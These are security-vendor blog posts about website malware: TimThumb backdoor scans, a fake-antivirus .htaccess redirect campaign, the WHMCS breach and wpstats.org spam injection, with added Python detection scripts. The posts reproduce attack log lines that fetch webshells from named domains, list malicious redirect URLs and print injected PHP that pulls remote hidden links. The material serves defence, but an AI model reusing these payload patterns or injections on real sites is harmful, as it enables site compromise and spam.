List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb-related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for this type of attack and a botnet with more than 1,000 IP addresses scanning for sites that might be vulnerable to it.

If you look at your logs, this is what it looks like:

216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""

or

112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""

The scanners probe hundreds of theme paths per site, looking for a theme that still ships the old timthumb.php, and try to make it fetch the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php onto the site.
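As an added example (not code from the original post), a small Python check that pulls requests like the two above out of an access log and tells lookalike hosts apart from genuinely allowed domains. It assumes the default remote-image allow-list of the vulnerable TimThumb 1.x releases, whose substring match accepted any host merely containing an allowed name (hence hosts such as blogger.com.nilgirisrealty.com); the last two sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Remote-image allow-list shipped with the vulnerable TimThumb 1.x releases.
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com",
                 "img.youtube.com", "upload.wikimedia.org", "photobucket.com"]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
TIMTHUMB_FILE = re.compile(r'/(timthumb|thumb)\.php$', re.IGNORECASE)

def host_is_allowed(host, allowed=ALLOWED_SITES):
    """Strict check: the host equals an allowed site or is a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in allowed)

def looks_like_allowed(host, allowed=ALLOWED_SITES):
    """The loose substring match of the old versions; blogger.com.evil.test passes it."""
    return any(s in host.lower() for s in allowed)

def classify(line):
    """None unless the line is a TimThumb request with a remote src=, else a verdict dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not TIMTHUMB_FILE.search(path):
        return None
    src_host = urlsplit(parse_qs(query).get("src", [""])[0]).hostname or ""
    if not src_host:                      # local image: normal thumbnail use
        return None
    if host_is_allowed(src_host):
        verdict = "allowed-remote"
    elif looks_like_allowed(src_host):
        verdict = "lookalike-bypass"      # the pattern in the post's log lines
    else:
        verdict = "external"
    return {"ip": m.group("ip"), "path": path, "src_host": src_host, "verdict": verdict}

def suspicious_hosts(lines):
    """Distinct src hosts failing the strict check: the webshell-hosting domains."""
    return sorted({h["src_host"] for h in map(classify, lines)
                   if h and h["verdict"] != "allowed-remote"})

# Sample input: the post's two log lines, then a constructed benign remote request and a constructed local one.
SAMPLE_LOG = [
    '216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""',
    '112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""',
    '10.0.0.5 - - [31/May/2012:04:00:00 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [31/May/2012:04:00:01 +0000] "GET /wp-content/themes/x/timthumb.php?src=wp-content/uploads/a.jpg HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
```

Running `suspicious_hosts(SAMPLE_LOG)` over a real log gives the list of hosts to block at the egress and to report, which is how a list like the one in the labs post is assembled.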

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb.

Sucuri is Hiring: Senior Security Support Analyst

It's that time again: we're actively looking for a Senior Security Support Analyst to join the family. If you are passionate about web-based malware, we want to hear from you. Details can be found here: http://sucuri.net/company/employment

How To: Enhance User Security with Dreamhost

If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment:

    1. Enhanced User Security

It adds a few security restrictions per site/account to minimize the chances of attacks from other users on the same shared server.

    2. Configure a different user account per site

There is also an option to create/isolate each site under its own user account. We highly recommend it to minimize cross-site reinfections.


Website Cross-site Contamination?

Learn more about the threats of cross-contamination by reading some of our recent posts: A Little Tale About Website Cross-Contamination and Website Cross-contamination: Blackhat SEO Spam Malware

How To… Submit Infected Site for Review with Bing Blacklisting Authority

Many are not aware that there are many different blacklisting authorities out there; some are more prevalent than others, but each has its own method of submitting for review. In this post I want to focus on Bing as a blacklisting authority specifically.

Like all the other blacklisting authorities, Bing uses its own proprietary method for crawling your site and identifying what is and isn't a potential security issue. We can't speak to their accuracy, but if you use Internet Explorer or Bing as a search engine and you get a big red screen warning you of issues, then these are likely the guys to start with.

Submitting Your Site to Bing via the Bing Webmaster Tools Interface

Here are the steps to follow after you have cleaned your site:

Step 1:

They have their own webmaster tools account, separate from Google and the others. This is the link to their service: http://www.bing.com/toolbox/webmaster/ . You will need a Windows Live ID, but don't worry, you can create a new one for your site.

Step 2:

Once logged in, you will be on the webmaster dashboard. You want to click on “Add Site” and, well, add your site:

Step 3:

When you add the site, the next thing it is going to ask you is to verify ownership. It'll give you three options: (a) place an XML file on the web server, (b) copy/paste a tag into a webpage, or (c) add a CNAME record to DNS; whichever you choose is your prerogative. I find it easy enough to simply drop an XML file on the server.

Step 4:

Once it verifies it’ll give you a nice little success window and give you the option to continue.

Note: it'll take about 24 hours for the site to be added and reviewed, but if you have already been flagged it should give you a message telling you that the site is infected. Sometimes, though, it's not as intuitive as you might like and you might have to go hunting for it.

Step 5:

Click on your site and it should take you to the DASHBOARD for the site.

Step 6:

Click on CRAWL, next to the Dashboard option.

Step 7:

Click on CRAWL DETAILS.

Step 8:

Click on the Malware Infected option to get details of where the infection was found.

Step 9:

Verify you have removed all the infections it has found; sometimes it doesn't list any, but if it does, be sure they are cleared.

Step 10:

Click on the notice showing the infection, and check the box to submit the site for review.

Note: it can take anywhere from 24 to 48 hours for Bing to reindex your site and clear the warning; patience is a virtue here.

Existing Client? No problem…

If you're an existing client you have no need to worry about this; simply submit a ticket and we'll be more than happy to (1) ensure the infection has been removed and (2) submit to this blacklisting authority on your behalf. Simply log into your account, submit a Malware Removal Request and tell us which authority is giving you problems.

WHMCS Website Hacked and Database Leaked

The WHMCS website and Twitter accounts got compromised yesterday, and their full database (and files) were posted online.

WHMCS Twitter Hacked

Yes, it means that if you have an account there, or if you use any of the WHMCS products, you have to change all your passwords ASAP, and wait for confirmation from them before downloading anything from their website again (since it might still be compromised or backdoored).

They posted the following on their blog:

Read More

The Sucuri Learn Blog

We have long known that the time was approaching in which we would need to improve our level of engagement with the community and start providing more substantial contributions around managing and securing your websites. We hope to use this blog, Learn Blog, to focus specifically on this challenge, educating our audience, such that through awareness we can improve security postures.

The idea is that our existing blog at blog.sucuri.net will revert back to its core focus of Research and Development (R&D) and other blogs will be created to focus on specific audiences.

The evolving nature of the web ecosystem means it's no longer about hiring a webmaster to help manage and administer your website. No, instead technologies like WordPress, Joomla, osCommerce and many others have empowered users to the point where the idea of a webmaster rarely surfaces when discussing a website. This fact is how the concept of a “Learn” blog came about.

It's about clearly articulating the basics and helping improve knowledge across the end-user spectrum, so that we can work together to combat the growing web-malware problem.

What we hope is to build a repository of knowledge that everyone can benefit from one post at a time.


If you want to know how to do something, send us a note at info@sucuri.net; if we find it useful to the masses we'll draft up a post and share it with the world.

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with malware that redirects users to the “Windows Web Secure Kit” fake/rogue antivirus. So if you get that message when visiting your (or any) site, you know it is likely compromised by it.

What is going on?

Once a site gets compromised, its .htaccess file is modified to redirect users running Windows and coming from search engines to some Russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

These then redirect the user to some intermediate sites (also .ru):
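As an added example (not from the original post), a check for the first stage described above: a Python scan of a site's .htaccess that flags RewriteRules sending visitors to an off-site host and reports whether the rule is keyed on a search-engine referrer or a user-agent. The .htaccess text is constructed, with attacker.example as a placeholder rather than one of the real domains.

```python
import re
from urllib.parse import urlsplit

SEARCH_ENGINES = re.compile(r"google|yahoo|bing|aol|ask\.com|msn", re.IGNORECASE)

def parse_rules(text):
    """Pair each RewriteRule with the RewriteCond lines that guard it."""
    rules, conds = [], []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0].lower() == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif parts[0].lower() == "rewriterule" and len(parts) >= 3:
            rules.append({"pattern": parts[1], "target": parts[2], "conds": conds})
            conds = []            # conditions apply only to the rule that follows them
    return rules

def find_conditional_redirects(text, own_hosts):
    """Rules that send visitors off-site, with what the redirect is keyed on."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for rule in parse_rules(text):
        host = urlsplit(rule["target"]).hostname
        if not host or host in own:
            continue              # internal rewrite or a redirect to our own site
        keyed_on = set()
        for var, pattern in rule["conds"]:
            if "HTTP_REFERER" in var.upper() and SEARCH_ENGINES.search(pattern):
                keyed_on.add("search-engine referrer")
            if "HTTP_USER_AGENT" in var.upper():
                keyed_on.add("user-agent")
        findings.append({"target_host": host, "keyed_on": sorted(keyed_on),
                         "pattern": rule["pattern"]})
    return findings

# Constructed sample: stock WordPress block, a legitimate redirect to the site's own
# www host, and an appended campaign-style rule pointing at a placeholder host.
SAMPLE_HTACCESS = r"""
# BEGIN WordPress
RewriteEngine On
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteRule ^old-page$ http://www.example.com/new-page [R=301,L]
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\. [NC]
RewriteCond %{HTTP_USER_AGENT} Windows [NC]
RewriteRule .* http://attacker.example/infinity?8 [R,L]
"""
```

Anything this reports for a site whose .htaccess should only contain the WordPress block is worth diffing against a known-good copy, since the redirect only fires for search-engine visitors and is invisible when you browse the site directly.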


Read More

Official WordPress Plugin Directory – Forcing Plugin Updates

For a while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven't seen much of anything happen: no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is that updates were forced, certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Read More

Blog Comments – Analysing 100,000 Comments and Spammers

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”


I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (a sign of community participation). Who doesn't, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be exact) comments that were sent to the network of sites we are monitoring. How many of them are spam? Who are the most annoying spammers? And things like that.


Read More

Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, they could be coming from wpstats.org. In some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if (function_exists('curl_init')) {
    // Fetch the remote "jQuery" file, which actually returns hidden spam links
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        // return the body as a string
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";   // print the fetched content straight into the page
}

If you are not familiar with PHP: this code contacts www.wpstats.org/jquery-1.6.3.min.js, which returns a long list of hidden links to be included on your site (not visible in a normal browser).

Read More